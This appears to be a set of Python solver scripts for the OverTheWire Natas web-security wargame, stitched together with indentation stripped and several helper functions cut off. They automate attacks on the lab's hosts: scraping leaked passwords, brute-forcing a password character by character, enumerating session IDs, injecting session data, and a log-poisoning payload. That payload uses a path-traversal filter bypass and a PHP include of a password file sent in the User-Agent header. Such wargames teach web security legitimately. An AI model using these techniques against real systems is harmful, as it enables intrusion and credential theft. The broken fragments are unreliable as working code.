def main():
usr = '******'
password = natas.get_credential(usr)
b64 = base64.b64encode('%s:%s' % (usr, password))
response = requests.get(URL, headers={'Authorization': 'Basic %s' % b64})
regex = r"<!--The password for natas2 is (\w*?) -->"
matches = re.finditer(regex, response.content, re.MULTILINE)
for matchNum, match in enumerate(matches, start=1):
found_password = match.group(1)
break
print('found password: %s' % found_password)
print('adding to credentials file....')
natas.save_credentials('natas2', found_password)
print('done')
def main():
PASS = natas.get_credential(USER)
b64 = base64.b64encode('%s:%s' % (USER, PASS))
response = requests.get(URL, headers={'Authorization': 'Basic %s' % b64})
regex = r"natas3:(\w+)"
matches = re.finditer(regex, response.content, re.MULTILINE)
password = None
for match in matches:
password = match.group(1)
if password is not None:
print('found password: %s' % password)
print('adding to credentials file....')
natas.save_credentials('natas3', password)
print('done')
import requests, re, base64, natas
B64 = 'Basic %s' % base64.b64encode(
'%s:%s' % ('natas21', natas.get_credential('natas21')))
URL = 'http://natas21.natas.labs.overthewire.org/index.php?debug'
CO_URL = 'http://natas21-experimenter.natas.labs.overthewire.org/index.php'
def main():
cookie = inject()
print('cookie: %s' % cookie)
response = requests.get(URL,
headers=dict(Authorization=B64),
cookies=dict(PHPSESSID=cookie))
regex = r"Password: (\w+)"
matches = re.finditer(regex, response.content, re.MULTILINE)
for match in matches:
print('found password: %s' % match.group(1))
print('adding to credentials....')
natas.save_credentials('natas22', match.group(1))
print('done')
break
def inject():
cookie = requests.post(CO_URL,
headers=dict(Authorization=B64),
data={
'align': 'center',
import re,requests,base64,natas,string
USER='******'
PASSWORD=natas.get_credential(USER)
URL='http://natas15.natas.labs.overthewire.org/index.php'
def main():
b64 = base64.b64encode('%s:%s' % (USER,PASSWORD))
password = ''
running = True
while (running):
found = False
for c in string.ascii_letters + string.digits :
if (guessed_correct(password + c, b64)):
password = password + c
found = True
print(password)
break
if (not found):
break
print('found password: %s' % password)
print('adding to credentials....')
natas.save_credentials('natas16',password)
print('done')
import re, requests, base64, natas, string, random
B64 = 'Basic %s' % base64.b64encode('%s:%s' % ('natas25',natas.get_credential('natas25')))
URL = 'http://natas25.natas.labs.overthewire.org/index.php?lang=..././logs/natas25_%s.log'
USER_AGENT = '<?php include "/etc/natas_webpass/natas26"; ?>'
def main():
session = random_string()
response = requests.get(
URL % session,
headers= {
'Authorization':B64,
'User-Agent':USER_AGENT
},
cookies=dict(PHPSESSID=session)
)
regex = r"\[\d{2}\.\d{2}\.\d{4}\s\d{2}::\d{2}:\d{2}\]\s(\w{32})"
matches = re.finditer(regex,response.content,re.MULTILINE)
for match in matches:
print('found password: %s' % match.group(1))
print('adding to credentials....')
natas.save_credentials('natas26',match.group(1))
print('done')
def random_string(string_length=20):
letters = string.ascii_lowercase
return ''.join(random.choice(letters) for i in range(string_length))
import natas, re, requests, base64
B64 = 'Basic %s' % base64.b64encode(
'%s:%s' % ('natas19', natas.get_credential('natas19')))
URL = 'http://natas19.natas.labs.overthewire.org/index.php'
"""
natas20:admin 3239332d6e617461733230
natas20:admin1 3431332d6e617461733230
natas21:admin 3632372d6e617461733231
pattern shows static backend (after \x2d) when user stays the same.
only changes when user is changed, not with password.
first 3 bytes are a number similar to the one in natas18
"""
USER = '******'
PASSWORD = '******'
def main():
for i in range(0, 641):
if (i % 20 == 0):
print('requesting: %d' % i)
password = do_request(i)
if (password is not None):
print('found password at %d: %s' % (i, password))
print('adding to credentials....')
natas.save_credentials('natas20', password)
print('done')
break